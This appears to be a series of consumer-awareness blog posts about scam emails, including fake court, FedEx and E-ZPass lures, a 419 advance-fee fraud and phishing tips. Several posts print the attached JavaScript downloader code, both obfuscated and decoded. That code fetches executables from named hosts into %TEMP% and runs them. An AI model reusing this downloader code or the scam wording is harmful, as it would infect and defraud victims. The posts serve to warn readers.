Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2′; };  function sah210() { return ‘+fr+'; }; function sah86() { return ‘ar dn'; };  function sah105() { return ‘rea'; };  function sah95() { return ‘bj'; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e'; }

function sah() { return ‘val'; }

function dl(fr)l”); v { var b = “w'; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split'; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };'; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

Spam from China

Chinese Spam

Why would anyone in their right mind respond to a mail blast like this, especially when it’s in Chinese?

尊敬的客户: 您好! 祝您业务更上一层楼。 我司十多年专为中小企业提供香港公司注册服务。在2014年在香港成立的公司有167279间,在2013年在香港成立的公司有174030间,在经济环境越不好的情况下,老板们更热衷研究并注册离岸公司。在香港成立公司是很简单的事情,两个星期多便可以注册完成,注册资本不需要验资,不需要到位,阁下也不需要到香港。在这些年,我们一直在埋头苦干,精心修炼,力争为您提供更专业的离岸注册服务。一直期待着您的联系。      希望! 本邮件是我们合作的开始.

———

English via Google Translate:

Dear Customer: Hello! I wish your business to the next level. Our ten years designed to provide SMEs in Hong Kong Companies Registry services. The company was established in 2014 in Hong Kong, there are 167,279 in the company in 2013 in Hong Kong has 174,030, in the worse economic environment, the owners are more keen to study and register offshore companies. Set up a company in Hong Kong is a very simple matter, more will be able to register two weeks to complete, registered capital does not require verification, no place, you do not need to go to Hong Kong. During these years, we have been working hard, careful cultivation, strive to provide you with more professional offshore registration services. We have been looking forward to your contact.I hope! This message is the beginning of our cooperation.

Unless they’re targeting people in the mainland, this seems like a phenomenally inefficient way of doing business. On the other hand, it could just be a phishing scam looking for the dumbest of the dumb.

The amount of business that is being done in the world based on dishonesty and deception makes my head hurt.

The Old Wolf has spoken.

Another package of Javascript malware

mon

I wish I were a javascript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)


var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e'; };

function xn() { return ‘val'; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202′; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);


The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip

 I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.
The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:
Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
The second is registered to someone in Turkey:
Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew javascript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

noattachments

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);'; };  function igs101() { return ‘); x'; };  function igs193() { return ‘ x'; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl'; };  function igs30() { return ‘i='; };  function igs140() { return ‘a.ty'; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou'; };  function igs162() { return ‘1; x'; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c'; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws'; };  function igs136() { return ‘”); x'; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2′; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);'; };  function igs229() { return ‘6001)'; };  function igs89() { return ‘ar x'; };  function igs66() { return ‘”)+'; };  function igs46() { return ‘WS'; };  function igs19() { return ‘ a'; };  function igs79() { return ‘m()*'; };  function igs186() { return ‘; };'; };  function igs28() { return ‘ (v'; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();'; };  function igs185() { return ‘r) {}'; };  function igs113() { return ‘ (x'; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+'; };  function igs70() { return ‘arCod'; };  function igs49() { return ‘ell'; };  function igs233() { return ‘); d'; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d'; };  function igs166() { return ‘ 0; x'; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s ='; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+'; };  function igs61() { return ‘rin'; };  function igs22() { return ‘ge.'; };  function igs102() { return ‘o.o'; };  function igs138() { return ‘pen'; };  function igs14() { return ‘cl'; };  function igs111() { return ‘n()'; };  function igs10() { return ‘so'; };  function igs48() { return ‘.Sh'; };  function igs51() { return ‘ v'; };  function igs98() { return ‘.XMLH'; };  function igs167() { return ‘a.'; };  function igs17() { return ‘etqy'; };  function igs42() { return ‘Ac'; };  function igs194() { return ‘o.'; };  function igs129() { return ‘eX'; };  function igs137() { return ‘a.o'; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.'; };  function igs159() { return ‘ { d'; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion'; };  function igs92() { return ‘new'; };  function igs18() { return ‘.com'; };  function igs106() { return ‘atec'; };  function igs8() { return ‘”dick'; };  function igs65() { return ‘P%'; };  function igs147() { return ‘e(xo'; };  function igs68() { return ‘g.f'; };  function igs75() { return ‘nd'; };  function igs24() { return ‘.spli'; };  function igs200() { return ‘”+b[i'; };  function igs47() { return ‘cript'; };  function igs227() { return ‘ } }'; };  function igs179() { return ‘n,'; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa'; };  function igs67() { return ‘Strin'; };  function igs34() { return ‘leng'; };  function igs27() { return ‘for'; };  function igs143() { return ‘; x'; };  function igs199() { return ‘tp://'; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R'; };  function igs39() { return ‘ w'; };  function igs4() { return ‘(fr'; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead'; };  function igs33() { return ‘b.'; };  function igs1() { return ‘funct'; };  function igs146() { return ‘it'; };  function igs44() { return ‘Objec'; };  function igs145() { return ‘wr'; };  function igs38() { return ‘ var'; };  function igs11() { return ‘nw'; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve'; };  function igs205() { return ‘p?r'; };  function igs169() { return ‘veT'; };  function igs174() { return ‘); tr'; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst'; };  function igs170() { return ‘oF'; };  function igs83() { return ‘)+”.e'; };  function igs230() { return ‘; d'; };  function igs78() { return ‘rando'; };  function igs149() { return ‘spo'; };  function igs21() { return ‘na'; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume'; };  function igs125() { return ‘ xa'; };  function igs76() { return ‘(Ma'; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl'; };  function igs134() { return ‘.St'; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat'; };  function igs150() { return ‘ns'; };  function igs135() { return ‘ream'; };  function igs114() { return ‘o.r'; };  function igs96() { return ‘ct(“M'; };  function zuw() { return ‘e'; };  function igs215() { return ‘.se'; };  function igs139() { return ‘(); x'; };  function igs62() { return ‘gs'; };  function igs130() { return ‘Obj'; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc'; };  function igs133() { return ‘ODB'; };  function igs207() { return ‘fr+”&'; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc'; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i'; };  function igs198() { return ‘”,”ht'; };  function igs148() { return ‘.Re'; };  function igs221() { return ‘) {}'; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s'; };  function igs165() { return ‘ion ='; };  function igs204() { return ‘nt.ph'; };  function igs104() { return ‘ea'; };  function igs55() { return ‘.Expa'; };  function igs112() { return ‘ { if'; };  function igs99() { return ‘TT'; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res'; };  function igs178() { return ‘un(f'; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op'; };  function igs85() { return ‘; v'; };  function igs214() { return ‘ xo'; };  function igs224() { return ‘ == 1′; };  function igs226() { return ‘reak;'; };  function igs223() { return ‘(dn'; };  function igs124() { return ‘{ var'; };  function igs196() { return ‘en(“G'; };  function igs95() { return ‘XObje'; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c'; };  function igs126() { return ‘ ='; };  function igs54() { return ‘ ws'; };  function igs73() { return ‘Math'; };  function igs82() { return ’00′; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s'; };  function igs107() { return ‘hang'; };  function igs86() { return ‘ar dn'; };  function igs190() { return ‘); }'; };  function igs155() { return ‘.si'; };  function igs213() { return ‘e);'; };  function igs58() { return ‘onm'; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id'; };  function igs120() { return ‘ta'; };  function igs121() { return ‘tu'; };  function igs88() { return ‘0; v'; };  function igs71() { return ‘e(92′; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+'; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu'; };  function igs69() { return ‘romCh'; };  function igs56() { return ‘ndEnv'; };  function igs64() { return ‘%TEM'; };  function igs212() { return ‘als'; };  function igs110() { return ‘nctio'; };  function igs103() { return ‘nr'; };  function igs164() { return ‘posit'; };  function igs173() { return ‘,2′; };  function igs225() { return ‘) b'; };  function igs53() { return ‘fn ='; };  function igs157() { return ‘> 500′; };  function igs151() { return ‘eBody'; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in'; };  function igs13() { return ‘tling'; };  function igs154() { return ‘xa'; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent'; };  function igs172() { return ‘fn'; };  function igs() { return ‘val'; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00′; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir'; };  function igs43() { return ‘tiveX'; };  function igs60() { return ‘St'; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch'; };  function igs77() { return ‘th.'; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.'; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD'; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET'; };  function igs128() { return ‘Activ'; };  function igs20() { return ‘volo'; };  function igs211() { return ‘, f'; };  function igs93() { return ‘ Acti'; };  function igs168() { return ‘sa'; };  function igs158() { return ‘0)'; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke'; };  function igs184() { return ‘ (e'; };  function igs220() { return ‘(er'; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks

nophishing

Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

A Letter from the “Assistant Secretary of State.”

Please us with this email again! Right, folks – the Bureau of Consular Affairs is going to use a foxmail address. For the love of all that’s holy, never respond to an email like this. If you do, you’re handing your hard-earned money to fleabitten African scammers. YES, THIS IS A SCAM. Yes, I’m SHOUTING!


From: Assistant Secretary of State Roberta Jacobson <Anderson@gamma.ocn.ne.jp>
Subject: Assistant Secretary of State Roberta Jacobson,

To: undisclosed-recipients:;

Bureau of Consular Affairs

Washington, DC 20520
Greeting from USA Embassy,

Attn Dear Citizens! Please us with this email again ( homelandsecurity20@foxmail.com )

This is to notify you that your consignment has been in our custody we are waiting for you to comply with our instructions before your package delivery will be effected to your delivery address. We have been waiting for you to contact us regarding your consignment box which Courier Company suppose to deliver to you which is on hold by USA Home Land Security Department Bureau and requesting for clearance certificate which will be obtain from the origination of the consignment box before it will be released. As a result of you not comply within duration given by Benin Government that is the reason the consignment box was diverted to treasury but the government of American have decide to make the world happy by been willing to release the package consisting of a Bank Draft Total sum of $ 3.5millions usd written with your name as the beneficiary within 4 hours immediately you secure the clearance certificate today.

After the Meeting Held by Our board of Director Which WAS Concluded That the Delivery of your Consignment to your address MUST BE Complete within 4hrs upon your Comply to Our requirement Which IS by sending the sum of  $ 155.00Usd  to enable the origin Obtain the needed certificate and your consignment for onward delivery to your house immediately without any further delay we decide to contact you because we confirm some offices are trying to deceive you.

Note that your consignment box has been arrived in US embassy and waiting to receive clearance certificate before the gate pass is given. Mean while you are advice to reconfirm the below information upon contacting us to avoid delivery to wrong person.

1, Full name:
2, Address:
3, Occupation:
4, Cell-Phone:
5, Nearest Airport:

Once you notify us with the Above Information include with the $ 55 payment we Will release your Consignment to you. Note That you Are expected to pay only  $ 155.00Usd  for Clearance certificate and you Are to pay it to Benin Republic as the origination of the Consignment box in favor of: Ofor Eze as Our accountant officer in Benin Republic Send the  $ 155.00Usd through Western Union or Money gram once you receive this mail with the Information Below for IMMEDIATE release of your Consignment box,

Receiver name: Ofor Eze
Country .. Benin Republic
city .. Cotonou
question: Yes
Answer: Yes.
Amount necessary. $ 155.00usd

Once you send the money, try to notify us with the MTCN for easy pick up and for immediate action on the release of your consignment.

Please treat this as matter of urgency .Note that any uncliam consignment will be return to the Courier Company after 3 days for final divertion as a result of failure to comply with our instruction and claim your consignment which arrived from Africa to our local airport here in USA.

So you are urgently advise to comply with our demand so that we will release your consignment we are working for the best of America citizen.

Treat with dispatch,
Yours Faithfully,
Assistant Secretary of State Roberta Jacobson,
FROM UNITED STATE OF AMERICA
Call +19189363447
Email: homelandsecurity20@foxmail.com

The Lads from Benin are still busy. They may be from Lagos, too – one can never tell where these drones are operating from.

Here’s my response to this one:

Nigerian Camels

All I can hope is that emails like this raise their blood pressure enough to precipitate a massive stroke…

The Old Wolf has spoken.